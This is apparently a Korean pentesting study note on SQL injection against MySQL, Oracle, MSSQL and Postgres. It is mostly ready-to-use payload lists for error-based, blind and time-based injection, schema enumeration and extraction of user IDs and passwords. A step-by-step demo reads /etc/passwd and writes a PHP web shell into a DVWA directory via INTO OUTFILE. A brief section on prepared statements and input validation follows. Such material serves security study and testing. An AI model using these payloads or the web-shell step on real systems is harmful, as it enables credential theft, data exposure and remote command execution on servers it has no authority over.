05. SQL 인젝션(MySQL, Oracle, MSSQL, ...)

취약점 소개

---

DB 서버와 클라이언트가 상호작용이 이루어지는 파라미터 값에 SQL 쿼리문을 삽입하여 해당 DB의 정보를 얻거나 조작할수 있는 취약점

 

판단 기준

---

SQL 쿼리 입력 검증이 미흡하여 서버와 질의/응답을 나누어 정보를 얻을 수 있는 경우

 

종류(Error-Based, Union-Based, Blind-Based, Stored Procedure Based, ...)

---

> Error-Based SQL Injection

: 강제로 에러를 유발시켜 에러 정보를 확인하고 DB정보를 얻을 수 있는 경우

 

> Union-Based SQL Injection

: 원래 기존의 요청 SQL 문에 추가 쿼리를 사용해서 DB정보를 얻을 수 있는 경우

(컬럼명은 기존 요청 SELECT 문과 달라도 되지만 컬럼 갯수가 다르면 오류가 발생)

 

> Blind-Based SQL Injectino

: 에러가 발생되지 않는 페이지에서 쿼리 참/거짓 또는 웹 페이지 응답 반응 시간을 확인하여 DB정보를 얻을 수 있는 경우

 - Time-Based SQL Injection

 - Boolean-Based SQL Injection

 

> Stored Procedure Based SQL Injection

: 저장 프로시저에 대한 접근 권한이 있어야만 실행 가능

 

 

공격구문

---

> Basic Injection

' and 1=1 --
' and 1=2 --

' and 1=1 #
' and 1=2 #

' and 1=1 /*
' and 1=2 /*

'+and+1=1+--
'+and+1=2+--

'	and	1=1	--
'	and	1=2	--

'	and	1=1	#
'	and	1=2	#

'	and	1=1	/*
'	and	1=2	/*

공백 우회> + /**/ ()(더하기, 주석, 괄호), %09(Tab), %0a(Line Feed \n), %0d(Carrage Return \r)
1'%09and%091=1%09--
1'%0aand%0a1=1%0a--
1'%0dand%0d1=1%0d--
1'/**/and/**/1=1/**/--
(1)'()and(1=1)--

======= 강제 에러 발생(Response-Based SQL Injection) =========
: Blind-Based SQL Injection 공격 진행하기 위해 참, 거짓 구별할 수 있는 컨텐츠가 있어야하는데 이것이 없을 경우 사용
: SQL 문은 반디시 '실행' 단계에서 에러가 발생해야 함
: 구문 자체에 오류가 있을 경우 참, 거짓과 관계없이 무조건 에러 나옴

- Character Type -
ORACLE : CASE WHEN [조건] THEN 'a' ELSE CAST(1/0 as char) END FROM dual
MSSQL  : CASE WHEN [조건] THEN 'a' ELSE CONVERT(char, 1/0) END
- Intager Type -
CASE WHEN [조건] THEN 1 ELSE 1/0 END

MySQL : CASE WHEN [조건] THEN 1 ELSE (SELECT 1 UNION SELECT 2) END

ex)
Oracle:select case when user='SYS' then 1/0 else (select 1 from dual) end from dual
MS-SQL :if ((select user) = 'sa' OR (select user) = 'dbo') select 1/0 else select 1
update: select case when( 1=1) then 1 else 1/0 end  
POSTGRES :SELECT CASE WHEN (1=2) THEN 1 ELSE 1/0 END;
update: case when (1=1) then 1 else (1 * (select 1 from information_schema.tables)) end)=1 
update: select case when (1=1) then 1 else 1*(select table_name from information_schema.tables)end)=1
=============================================================

 

> DB 판별(DB 버전 정보)

|| MySQL 판별||
SELECT @@version;
=============================================================
SELECT extractvalue(1,concat(0x3a,version()));


|| Oracle 판별 || 
SELECT * FROM v$version;
=============================================================
CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual;


|| MS SQL Server 판별||
SELECT @@VERSION;
=============================================================
SELECT convert(int,@@version);
SELECT cast((SELECT @@version) as int);


================= TEST Oracle(Error-Based) ==================
' and length(user)=1 --
...

' and substr(user,1,1)=65 --
...
' and substr(user,1,9)='TEST_AAAA'


') AND CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual;
') AND CTXSYS.DRITHSX.SN(1,(SELECT banner FROM v$version WHERE rownum=1)) <> 1;

')+AND+CTXSYS.DRITHSX.SN(user,(select+banner+from+v$version+where+rownum=1))+FROM+dual;
')+AND+CTXSYS.DRITHSX.SN(1,(SELECT+banner+FROM+v$version+WHERE+rownum=1))+<>+1;
-> 서버 정보 확인

)'+AND+CTXSYS.DRITHSX.SN(user,(SELECT+COUNT(TABLE_NAME)+FROM+USER_TABLES))=1;
-> user 전체 테이블 갯수 조회 (000 키워드 사전이 존재하지 않습니다)

1'+AND+CTXSYS.DRITHSX.SN(user,(SELECT+TABLE_NAME+FROM+(SELECT+TABLE_NAME,+ROWNUM+AS+RNUM+FROM+USER_TABLES)+WHERE RNUM=10))=1;
-> user 테이블 조회 (000 키워드 사전이 존재하지 않습니다)(계정 테이블 얻기)

1'+AND+CTXSYS.DRITHSX.SN(user,(SELECT+COLUMN_NAME+FROM+(SELECT+COLUMN_NAME,+ROWNUM+AS+RNUM+FROM+ALL_TAB_COLUMNS+WHERE+TABLE_NAME='[]')+WHERE+RNUM=1))=1+;
-> [] 컬럼 인덱스 조회 (계정 관련 테이블 유추 후에 관련 아이디 및 패스워드 컬럼 값 얻기)

1'+AND+CTXSYS.DRITHSX.SN(user,(SELECT+[아이디 관련 얻은 키워드1]||'+:+'||[비밀번호 관련 얻은 키워드2]+FROM+(SELECT+[아이디 관련 얻은 키워드1],+[비밀번호 관련 얻은 키워드2],+ROWNUM+AS+RNUM+FROM+[계정 테이블])+WHERE+RNUM=2))=1+;
-> 아이디, 패스워드 얻기

================= TEST Oracle(Blind) ==================
')+and+(select+count(table_name)+from+user_tables)=1;
')+and+(select+count(table_name)+from+user_tables)=2;
...
-> 테이블 갯수 확인

')+and+ascii(substr((select+table_name+from+(select+rownum+as+rnum,table_name+from+user_tables)+where+rnum=1),1,1))<100--
...
-> 테이블 명 확인

'and+ascii(substr((select+column_name+from+(select+rownum+as+rnum,column_name+from+all_tab_columns+where+table_name='[얻은 테이블명]')+where+rnum=1),1,1))>75--
...
-> 컬럼 명 확인
-> 얻고자 하는 컬럼명 계속 확인(rnum=[숫자])

...

================= TEST MySQL&Maria(Error-Based) ==================
1+or+2+and+extractvalue(1,concat(0x3a,version()));
1+or+2+AND+extractvalue(rand(),concat(0x3a,version()))+--
and+extractvalue(1,concat(0x3a,version()));
'+and+extractvalue(1,concat(0x3a,version()));
...
-> 에러베이스 Injection 가능 여부 확인

1+or+2+and+extractvalue(1,concat(0x3a,version()));
1+or+2+AND+extractvalue(rand(),concat(0x3a,version()))+--
'+AND+extractvalue(1,concat(0x3a,version()))+--
'+AND+extractvalue(rand(),concat(0x3a,version()))+--

1+or+2+AND(SELECT+1+FROM(SELECT+COUNT(*),concat(version(),FLOOR(rand(0)*2))x+FROM+information_schema.TABLES+GROUP+BY+x)a)+--
1 or 2 AND row(1,1)>(select count(*),concat(version(),floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1);
1 or 2 AND UpdateXML(1,concat(0x01,version()),1);
-> DB 버전 추출
-> DB Error :: XPATH syntax error: ':5.5.64-MariaDB-1ubuntu0.14.04.1'

1+or+2+AND+extractvalue(rand(),concat(0x3a,(SELECT+concat(0x3a,schema_name)+FROM+information_schema.schemata+LIMIT+0,1)))+--
1+or+2+AND+extractvalue(rand(),concat(0x3a,(SELECT+concat(0x3a,schema_name)+FROM+information_schema.schemata+LIMIT+1,1)))+--
...
-> DB명 추출 (LIMIT으로 값 반응 확인)
-> DB Error :: XPATH syntax error: '::information_schema'

1+or+2+AND+extractvalue(rand(),concat(0x3a,database()))+--
1+or+2+AND+extractvalue(rand(),concat(0x3a,(SELECT+concat(0x3a,schema_name)+FROM+information_schema.schemata+LIMIT+1,1)))+--
DB Error :: XPATH syntax error: ':counting_query'
-> DB명 추출 (웹 애플리케이션과 통신 중인 데이터베이스) 

1 or row(1,1)>(select count(*),concat(ps,floor(rand(0)*2)) as test from information_schema.tables group by test limit 1)
-> DB Error :: Duplicate entry '6ee4d4d7f9694f8355d15ac74116c6bb' for key 'group_key'

 

> MSSQL

|| MSSQL Injection ||
select [컬럼1][컬럼2] from [테이블명] ... like '%[사용자 값]%';

[사용자 값]
1' and 1=1 -- (참 값 동작)
1' and 1=2 -- (거짓 값 동작)
1' and (len(user))=3 --	(참 값 동작)
1' and (len(db_name()))=9 -- (참 값 동작)

-- substring
<< Get DataBase Name >>
1' and substring(db_name(),1,1)='a' --
1' and ascii(substring(db_name(),1,1))=97 --
1' and ascii(substring(db_name(),1,1))>96 --
1' and ascii(substring(db_name(),1,1))<98 --

1' and substring(db_name(),1,1)='b' --
1' and substring(db_name(),1,1)='c' --
1' and substring(db_name(),1,1)='d' --
1' and substring(db_name(),1,1)='e' --
1' and substring(db_name(),1,1)='f' --
1' and substring(db_name(),1,1)='g' --
1' and substring(db_name(),1,1)='h' --
1' and substring(db_name(),1,1)='i' --
1' and substring(db_name(),1,1)='j' --
1' and substring(db_name(),1,1)='k' --
1' and substring(db_name(),1,1)='l' --
1' and substring(db_name(),1,1)='m' --
1' and substring(db_name(),1,1)='n' --
1' and substring(db_name(),1,1)='o' --
1' and substring(db_name(),1,1)='p' --
1' and substring(db_name(),1,1)='q' --
1' and substring(db_name(),1,1)='r' --
1' and substring(db_name(),1,1)='s' --
1' and substring(db_name(),1,1)='t' --
1' and substring(db_name(),1,1)='u' --
1' and substring(db_name(),1,1)='v' --
1' and substring(db_name(),1,1)='w' --
1' and substring(db_name(),1,1)='x' --
1' and substring(db_name(),1,1)='y' --
1' and substring(db_name(),1,1)='z' --

<< Get Table Name in Database (사용자 정의 테이블 (User table)>>
1' and substring((select top 1 name from sysobjects where xtype='U'),1,1)='a' --

...

<< 정보 수집 >>
and 1=(SELECT @@VERSION)
-> 버전 체크

and 1=(select name from master.dbo.sysdatabases where dbid=7)
-> DB확인: DB가 존재하면 에러출력, 존재하지 않으면 정상작동
-> 1~6은 시스템 DB, 7~ 사용자 DB

and 0<>db_name()
-> 현재 DB 조회

and user>0
-> 현재 유저명 조회


<< 데이터베이스 구조 >>
' having 1=1 --
-> 현재 테이블 조회

' group by user.id having 1=1 --
-> 현재 컬럼명 조회

' union select sum(컬럼명) from 테이블명 --
-> 컬럼 타입 조회


<< 권한 체크 >>
and 1=(IS_SRVROLEMEMBER('sysadmin'))
-> 권한종류:sysadmin，dbcreator，diskadmin，processadmin，serveradmin，setupadmin，securityadmin

and 1=(IS_MEMBER('db_owner'))
-> 해당 데이터베이스 권한

;declare @a int;--
-> declare, 사용여부


<< 테이블 조회 >>
' and 0<>(select top 1 name from (select top where xtype='U' order by name asc) as table1 order by name desc) --
-> 특정 DB에서 사용자가 만든 테이블명 불러오기(top 행 증가시켜서 확인)

<< 테이블 아이디 조회 >>
' and 0<>(select count(*) from .dbo.sysobjects where xtype='U' and name='[테이블이름]' and
uid>(str(id))) --

<< 테이블의 컬럼명 조회 >>
' and 1=(select top 1 name from .dbo.sysobjects where name not in (select top 0 name from .dbo.sysobjects where id=357576312) and id=357576312) --

<< Blind SQL Injection >> 
ascii(substring((select top 1 m_id from member_info),1,1))=49 --

<< Time-Based SQL Injection >>
    1';if ascii(substring((select top 1 m_id from member_info),1,1))=1 waitfor delay '00:00:01' -- 
-> waitfor delay '00:00:00' 라는 함수를 이용하여 참일 경우 딜레이되고, 거짓일 경우 바로 결과를 반환하여 참과 거짓을 판단

 

그 밖에 관련 정보

---

> CIA별 측면

- 기밀성

: 도청, 사회공학 기법, ... (SELECT)

: SQL 쿼리문 통해 사용자 데이터, DB 정보 접근

 

- 무결성: 

: 데이터 변조, ... (INSERT, UPDATE, ...)

: SQL 쿼리문을 통해 DB 내용 조작, ...

 

- 가용성: 

: DoS, DDoS, ... (SLEEP(), "00:00:01", ...)

: SQL 쿼리 과도한 양 전송, SLEEP, ...

 

 

> 클라이언트-서버 흐름

Client   -   WAS(Web Server, Web Container(WAS))   -   DB

 

WS: Microsoft IIS(.NET Core / ASP.NET Core ), Nginx, ...

WAS: Apache Tomcat , JEUS, IBM WebSphere, ...

 

 

> MySQL Injection 만의 기능

: 함수 기능(LOAD_FILE(), INTO OUTFILE(),...)

 

- LOAD_FILE() : 파일을 읽고 파일 내용을 반환하는 함수

- INTO OUTFILE() : 파일에 선택한 행을 기록하는 SQL 문법

 (INTO OUTFILE 전제 조건)

 1. MySQL 유저가 파일 쓰기 권한이 있어야 함
 2. 리눅스 유저 mysql은 쓰고자 하는 폴더에 쓰기 권한 있어야 함

<<공격 시연>>
Step 1) 컬럼 갯수 파악
(order by 절, ...)

Step 2) MySQL 유저 확인
(' UNINON SELECT 1, user FROM mysql.user --, ...)
> guest, root, ...

Step 3) MySQL 유저 목록의 파일 권한 확인
(' UNION SELECT 1, group_concat(user, 0x3a, file_priv) FROM mysql.user --, ...)
> guest: Y, root: Y, ...

Step 4) /etc/passwd 파일 내용 출력
(' UNION SELECT 1, load_file('/etc/passwd') --, ' union select 1, load_file(char(47,101,116,99,47,112,97,115,115,119,100)) #, ' union select 1, load_file(0x2f6574632f706173737764) #)

Step 5) WebShell 업로드
(' union select 1, "<? system($_REQUEST['cmd']); ?>" into outfile '/var/www/dvwa/vulnerabilities/sqli/koromoon.php' #)

 

대응방안

---

> SQL 쿼리에 사용되는 문자열 유효성 검증 로직 Server Side 단에서 구현

> replace all 메서드 사용(사용 서버에 따라 적용 필요)

> Prepared Statement 객체 사용

: 사용자 입력을 쿼리의 일부로 직접 동작시키지 않음

(사용자 입력이 바인딩(고정된 값)되기 때문에 쿼리로 해석되지 않음)

 1. 플레이스 홀더(?) 사용해서 쿼리 준비

 2. 파리미터 바인딩 (이 과정에서 적절하게 이스케이프(단순 문자 처리)되거나 형식 지정됨)

 3. 쿼리 실행

 

Refer to...

---

▶(SQL 쿼리문 보기 좋게 정렬 사이트) https://www.dpriver.com/pp/sqlformat.htm

▶(SQL Injection 우회 사이트) https://security04.tistory.com/171

▶(Decode&Encode Tools) https://dencode.com/

▶(Oracle 에러코드) https://blog.naver.com/femgfemg/120110867050

▶(MySQL 에러코드) https://2factor.tistory.com/14

▶(MSSQL 에러코드) https://halizy.tistory.com/11#google_vignette

▶(URL Encoding) https://www.eso.org/~ndelmott/url_encode.html

▶(Github-Injection Payload) https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/tree/main/MSSQL%20-%20Error%20Based%20SQLi

▶(DB 종류별 명령어) https://noirstar.tistory.com/291

▶...